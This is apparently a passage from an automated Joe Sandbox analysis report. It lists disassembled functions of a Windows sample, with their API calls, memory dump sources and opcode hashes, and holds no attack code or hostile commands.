                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 96f78db9f165dd51a52bcf3b379c6ab1e4e859be9899cb59aa583586cf8256c4
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: 96f78db9f165dd51a52bcf3b379c6ab1e4e859be9899cb59aa583586cf8256c4
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d1c77e03578586ff7b8cf8b5ca08ae37816ee8482f2071b5dbea3565f21e27c5
                                                                                                                    • Instruction ID: 5dda8a43ef451975d1f91d758db3bf14d9704fa382f48c28223759a15e685ce8
                                                                                                                    • Opcode Fuzzy Hash: d1c77e03578586ff7b8cf8b5ca08ae37816ee8482f2071b5dbea3565f21e27c5
                                                                                                                    • Instruction Fuzzy Hash: DCA011C22A8002BC3808E2A02C82C3B028CC0C0B2033288FEF822820E0BC8088000830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: fc4de28800c55bfca7311043ec43d7a1db9980786be0e40595034a46f0ac412c
                                                                                                                    • Instruction ID: 5dda8a43ef451975d1f91d758db3bf14d9704fa382f48c28223759a15e685ce8
                                                                                                                    • Opcode Fuzzy Hash: fc4de28800c55bfca7311043ec43d7a1db9980786be0e40595034a46f0ac412c
                                                                                                                    • Instruction Fuzzy Hash: DCA011C22A8002BC3808E2A02C82C3B028CC0C0B2033288FEF822820E0BC8088000830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 4b2336450ba8d354402e14d69968548551dac3f0c0013febc901f246f7fea7f2
                                                                                                                    • Instruction ID: a014c4f47a88a9054eafe820d23a8bc8a4400c7340e5c6a4b1c42f717c2ed3bd
                                                                                                                    • Opcode Fuzzy Hash: 4b2336450ba8d354402e14d69968548551dac3f0c0013febc901f246f7fea7f2
                                                                                                                    • Instruction Fuzzy Hash: 0DA011C22A80003C3808E2A02C82C3B0A8CC0E0B2233282FEF822A20E0BC8088000830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 0bb6b50d525aaa3b2e4f3dbfa3109a9ebbd2ebf9119a0eb894410b7fc181a827
                                                                                                                    • Instruction ID: 60d54fdcedb85bdb9e71290b0cacac07cbc2a47b7a8c40a6cdeb568c3777bfb0
                                                                                                                    • Opcode Fuzzy Hash: 0bb6b50d525aaa3b2e4f3dbfa3109a9ebbd2ebf9119a0eb894410b7fc181a827
                                                                                                                    • Instruction Fuzzy Hash: 3FA011C22A8002BC3808E2802C82CBB0A8CC0C2F2033088FEF822800A0BC80CC000830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 94869ae745b56b0f6d9ee51ce2e61d420c892f1416818ba46b54b4474618f977
                                                                                                                    • Instruction ID: 60d54fdcedb85bdb9e71290b0cacac07cbc2a47b7a8c40a6cdeb568c3777bfb0
                                                                                                                    • Opcode Fuzzy Hash: 94869ae745b56b0f6d9ee51ce2e61d420c892f1416818ba46b54b4474618f977
                                                                                                                    • Instruction Fuzzy Hash: 3FA011C22A8002BC3808E2802C82CBB0A8CC0C2F2033088FEF822800A0BC80CC000830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • SetEndOfFile.KERNELBASE(?,00B8903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00B89F0C
                                                                                                                    Similarity
                                                                                                                    • API ID: File
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 749574446-0
                                                                                                                    APIs
                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00B9AE72,C:\Users\user\Desktop,00000000,00BC946A,00000006), ref: 00B9AC08
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611563598-0
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00B895D6,?,?,?,?,?,00BB2641,000000FF), ref: 00B8963B
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B9C2B1
                                                                                                                    • EndDialog.USER32(?,00000006), ref: 00B9C2C4
                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 00B9C2E0
                                                                                                                    • SetFocus.USER32(00000000), ref: 00B9C2E7
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B9C321
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B9C358
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B9C36E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9C38C
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9C39C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B9C3B8
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B9C3D4
                                                                                                                    • _swprintf.LIBCMT ref: 00B9C404
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B9C417
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B9C41E
                                                                                                                    • _swprintf.LIBCMT ref: 00B9C477
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B9C48A
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B9C4A7
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B9C4C7
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9C4D7
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B9C4F1
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B9C509
                                                                                                                    • _swprintf.LIBCMT ref: 00B9C535
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B9C548
                                                                                                                    • _swprintf.LIBCMT ref: 00B9C59C
                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B9C5AF
                                                                                                                      • Part of subcall function 00B9AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B9AF35
                                                                                                                      • Part of subcall function 00B9AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BBE72C,?,?), ref: 00B9AF84
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                    • API String ID: 797121971-1840816070
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B86FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00B87013
                                                                                                                    • _wcslen.LIBCMT ref: 00B87084
                                                                                                                      • Part of subcall function 00B87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87AAB
                                                                                                                      • Part of subcall function 00B87A9C: GetLastError.KERNEL32 ref: 00B87AF1
                                                                                                                      • Part of subcall function 00B87A9C: CloseHandle.KERNEL32(?), ref: 00B87B00
                                                                                                                      • Part of subcall function 00B8A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00B8977F,?,?,00B895CF,?,?,?,?,?,00BB2641,000000FF), ref: 00B8A1F1
                                                                                                                      • Part of subcall function 00B8A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B8977F,?,?,00B895CF,?,?,?,?,?,00BB2641), ref: 00B8A21F
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B87139
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B87155
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B87298
                                                                                                                      • Part of subcall function 00B89DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B873BC,?,?,?,00000000), ref: 00B89DBC
                                                                                                                      • Part of subcall function 00B89DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B89E70
                                                                                                                      • Part of subcall function 00B89620: CloseHandle.KERNELBASE(000000FF,?,?,00B895D6,?,?,?,?,?,00BB2641,000000FF), ref: 00B8963B
                                                                                                                      • Part of subcall function 00B8A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A501
                                                                                                                      • Part of subcall function 00B8A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                    • Opcode ID: e12deb0ac3c44588bc2dadd454643df6b46f5127512ff000d1fb3d8d4c9eb257
                                                                                                                    • Instruction ID: 0b93cebaca456bdc025b1a34c2dd4c72a9711c79d08f72b3f0a4a62264acb86e
                                                                                                                    • Opcode Fuzzy Hash: e12deb0ac3c44588bc2dadd454643df6b46f5127512ff000d1fb3d8d4c9eb257
                                                                                                                    • Instruction Fuzzy Hash: 0AC1C371944604AADB25FB74CC81FEEB3E8EF05304F14459AF956E32A2DB70EA44CB61
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __floor_pentium4
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                    • Opcode ID: a0f3048445bd9e5210761ec0faa129534a0f97e332367ee46c37abff0f6aab06
                                                                                                                    • Instruction ID: 6854e8c45e8e95ad5ebb98374a1a9cbe1add17239ade46156d4e2a86755cb636
                                                                                                                    • Opcode Fuzzy Hash: a0f3048445bd9e5210761ec0faa129534a0f97e332367ee46c37abff0f6aab06
                                                                                                                    • Instruction Fuzzy Hash: 3FC24C71E086288FDB25CE28DD807EAB7F5EB4A314F1541EAD45EE7240E775AE818F40
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                    • Opcode ID: b53d8d7875c552dbf824d3fc93227ed9260e8ccc311ec4a299f348b81ae838e0
                                                                                                                    • Instruction ID: 812d633061054f1b8ca7ebfec6f9ee491fd1cc1887ab0cd742572172eba2f2c6
                                                                                                                    • Opcode Fuzzy Hash: b53d8d7875c552dbf824d3fc93227ed9260e8ccc311ec4a299f348b81ae838e0
                                                                                                                    • Instruction Fuzzy Hash: 9D32D6B15142849FDF14EF74C895AE93BE5EF15B00F0804BDFD8A8B292DB749A49CB60
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B82874
                                                                                                                    • _strlen.LIBCMT ref: 00B82E3F
                                                                                                                      • Part of subcall function 00B902BA: __EH_prolog.LIBCMT ref: 00B902BF
                                                                                                                      • Part of subcall function 00B91B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B8BAE9,00000000,?,?,?,0001040E), ref: 00B91BA0
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B82F91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                    • String ID: CMT
                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                    • Opcode ID: 2fac716011019dbff1c0d0ae4c41174fc3d738fdd72243215f70163455a3670f
                                                                                                                    • Instruction ID: d147d170b1ef058ddceedee5b5c37b13c0bbec4739263ada628ae4d84ac17b7c
                                                                                                                    • Opcode Fuzzy Hash: 2fac716011019dbff1c0d0ae4c41174fc3d738fdd72243215f70163455a3670f
                                                                                                                    • Instruction Fuzzy Hash: 1E62F5715006458FDF19EF38C8867EA3BE1EF55300F0845BEEC9A8B2A2DB759945CB60
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B9F844
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00B9F910
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B9F930
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00B9F93A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 254469556-0
                                                                                                                    • Opcode ID: 804c4fb853597e9f20cad4692871764bd52520486c401e8890cef78ab6e74055
                                                                                                                    • Instruction ID: 6e348d1fee1bfcf6f6f0ed28997b78e73a2f9c06a678a512da032b7383fe7a40
                                                                                                                    • Opcode Fuzzy Hash: 804c4fb853597e9f20cad4692871764bd52520486c401e8890cef78ab6e74055
                                                                                                                    • Instruction Fuzzy Hash: 62311475D052199BDF20DFA4D989BCCBBF8AF08704F1041EAE40CAB250EBB19B848F44
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(80000000,00B9E5E8,0000001C,00B9E7DD,00000000,?,?,?,?,?,?,?,00B9E5E8,00000004,00BE1CEC,00B9E86D), ref: 00B9E6B4
